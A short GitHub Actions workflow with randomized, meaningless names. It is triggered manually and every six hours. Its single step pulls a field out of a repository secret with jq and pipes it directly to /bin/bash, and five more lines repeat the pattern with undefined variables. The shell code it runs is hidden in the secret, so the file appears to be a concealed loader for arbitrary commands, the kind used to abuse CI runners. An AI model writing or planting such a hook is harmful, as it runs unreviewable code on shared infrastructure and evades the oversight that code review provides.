name: yutongvvg
on:
  workflow_dispatch:
  schedule:
    - cron: '4 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yutongvvg
        env:
          c76: ${{ secrets.c76 }}
        run: |
          echo $c76 | jq -r .msiz39 | /bin/bash
          echo $ug07213 | jq -r .nbh18 | /bin/bash
          echo $xmkdy7355 | jq -r .mz5 | /bin/bash
          echo $x0322 | jq -r .xdd3 | /bin/bash
          echo $aiff1010 | jq -r .efou92 | /bin/bash
          echo $ma876 | jq -r .ee4151 | /bin/bash

